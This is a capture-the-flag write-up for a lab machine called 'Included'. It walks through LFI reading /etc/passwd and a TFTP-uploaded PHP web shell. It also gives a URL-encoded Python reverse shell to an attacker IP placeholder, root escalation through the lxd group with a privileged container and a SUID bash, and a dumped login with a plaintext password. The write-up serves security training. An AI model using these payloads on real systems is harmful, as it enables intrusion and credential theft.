Skip to content

Included

Nmap scan

┌──(kali㉿kali)-[~]
└─$ sudo nmap <MACHINE_IP> -sC -sV -p80          
Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-10 20:33 EDT
Nmap scan report for <MACHINE_IP>
Host is up (0.052s latency).

PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
| http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_Requested resource was http://<MACHINE_IP>/?file=index.php

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.56 seconds

Only port 80 open so let's check that website

Port 80

Immediately i noticed that the URL was: http://<MACHINE_IP>/?file=index.php so i tried LFI with http://<MACHINE_IP>/?file=../../../../../../etc/passwd:

root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin syslog:x:102:106::/home/syslog:/usr/sbin/nologin messagebus:x:103:107::/nonexistent:/usr/sbin/nologin _apt:x:104:65534::/nonexistent:/usr/sbin/nologin lxd:x:105:65534::/var/lib/lxd/:/bin/false uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin pollinate:x:109:1::/var/cache/pollinate:/bin/false mike:x:1000:1000:mike:/home/mike:/bin/bash tftp:x:110:113:tftp daemon,,,:/var/lib/tftpboot:/usr/sbin/nologin 

So we have that. I tried gobuster and wfuzz to try to get more information about the files in the machine but nothing there. I even run a full port scan but no luck.

More ports?

I noticed that in the passwd file we can see a tftp user so maybe if we run an UDP scan with nmap we would find more open ports?

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sU <MACHINE_IP> -p69                                        130 ⨯
Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-10 21:29 EDT
Nmap scan report for <MACHINE_IP>
Host is up (0.052s latency).

PORT   STATE         SERVICE
69/udp open|filtered tftp

Nmap done: 1 IP address (1 host up) scanned in 0.92 seconds

Ok so maybe we are starting to get our luck back, looks like we have a tftp service, a really basic ftp(And without authentication!). Let's check it out.

Tftp service

Instead of using the tftp client I preferred Python with the library tftpy

#! /usr/bin/env python3

import tftpy

client = tftpy.TftpClient('<MACHINE_IP>', 69)

# Create a testing file (Looks like gets deleted on upload)
f = open("test.txt", "w")
f.write("Im just a test file!")
f.close()

try:
    client.upload("test_remote.txt", "test.txt", timeout=5)
    print('---------------')
    print('File uploaded!')
    print('---------------')
except Exception as e:
    print(e)

I tested the script and it is reporting that the file is being uploaded. Now we need to know where it is, i searched for the service configuration file using the LFI we already have:

http://<MACHINE_IP>/?file=../../../../etc/default/tftpd-hpa
# /etc/default/tftpd-hpa TFTP_USERNAME="tftp" TFTP_DIRECTORY="/var/lib/tftpboot" TFTP_ADDRESS=":69" TFTP_OPTIONS="-s -l -c" 

And now we know that the files we upload are in /var/lib/tftpboot let's try it:

http://<MACHINE_IP>/?file=../../../../var/lib/tftpboot/test_remote.txt
Im just a test file! 

Cool! I guess we can try to upload something more interesting for us:

<?php
    if(isset($_GET['cmd'])){
        system($_GET['cmd']);
    }
?>

And the result:

http://<MACHINE_IP>/?file=../../../../var/lib/tftpboot/shell_remote.php&cmd=id
uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Now we have RCE and we can get a reverse shell! We can use this URL encoded payload:

http://<MACHINE_IP>/?file=../../../../var/lib/tftpboot/shell_remote.php&cmd=python3%20-c%20%27import%20socket%2Csubprocess%2Cos%3Bs%3Dsocket.socket%28socket.AF_INET%2Csocket.SOCK_STREAM%29%3Bs.connect%28%28%22<ATACKER_IP>%22%2C<ATACKER_PORT>%29%29%3Bos.dup2%28s.fileno%28%29%2C0%29%3B%20os.dup2%28s.fileno%28%29%2C1%29%3B%20os.dup2%28s.fileno%28%29%2C2%29%3Bp%3Dsubprocess.call%28%5B%22%2Fbin%2Fsh%22%2C%22-i%22%5D%29%3B%27

Into the machine

Once into the machine i looked around for a while, run linpeas... but I couldn't find anything obvious. After a while I tried the password Sheffield19 that we got in the Pathfinder machine and... worked! I guess I should have started with that.

From mike to root

The user flag is in /home/mike/user.txt. I immediately saw that this user is part of the lxd group so we can use that for privilege escalation.

# Import the image
lxc image import ./alpine-v3.14-x86_64-20210909_2211.tar.gz --alias justAnImage

# Init the storage pool as default if it is not
lxd init

# Run the image with security.privileged
lxc init justAnImage nothingBadHere -c security.privileged=true

# Mount the host disk into the container /mnt/root path
lxc config device add nothingBadHere hostDisk disk source=/ path=/mnt/root recursive=true

# Start the container and attach to it
lxc start nothingBadHere
lxc exec nothingBadHere /bin/sh

Once into the container we can just go to /mnt/root to get access to the host file system as root. Once there, i like to add the SUID bit to the bash binary to get root access outside the container with: bash -p. The root flag is under /root/root.txt and also in the /root folder we can see a file called login.sql:

bash-4.4# cat login.sql 
-- MySQL dump 10.16  Distrib 10.1.44-MariaDB, for debian-linux-gnu (x86_64)
--
-- Host: localhost    Database: Markup
-- ------------------------------------------------------
-- Server version   10.1.44-MariaDB-0ubuntu0.18.04.1

/*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */;
/*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */;
/*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */;
/*!40101 SET NAMES utf8mb4 */;
/*!40103 SET @OLD_TIME_ZONE=@@TIME_ZONE */;
/*!40103 SET TIME_ZONE='+00:00' */;
/*!40014 SET @OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0 */;
/*!40014 SET @OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0 */;
/*!40101 SET @OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='NO_AUTO_VALUE_ON_ZERO' */;
/*!40111 SET @OLD_SQL_NOTES=@@SQL_NOTES, SQL_NOTES=0 */;

--
-- Table structure for table `login`
--

DROP TABLE IF EXISTS `login`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `login` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `username` varchar(100) NOT NULL,
  `password` varchar(100) NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=2 DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `login`
--

LOCK TABLES `login` WRITE;
/*!40000 ALTER TABLE `login` DISABLE KEYS */;
INSERT INTO `login` VALUES (1,'Daniel','>SNDv*2wzLWf');
/*!40000 ALTER TABLE `login` ENABLE KEYS */;
UNLOCK TABLES;
/*!40103 SET TIME_ZONE=@OLD_TIME_ZONE */;

/*!40101 SET SQL_MODE=@OLD_SQL_MODE */;
/*!40014 SET FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS */;
/*!40014 SET UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS */;
/*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */;
/*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */;
/*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */;
/*!40111 SET SQL_NOTES=@OLD_SQL_NOTES */;

It has new credentials: Daniel:>SNDv*2wzLWf

Back to top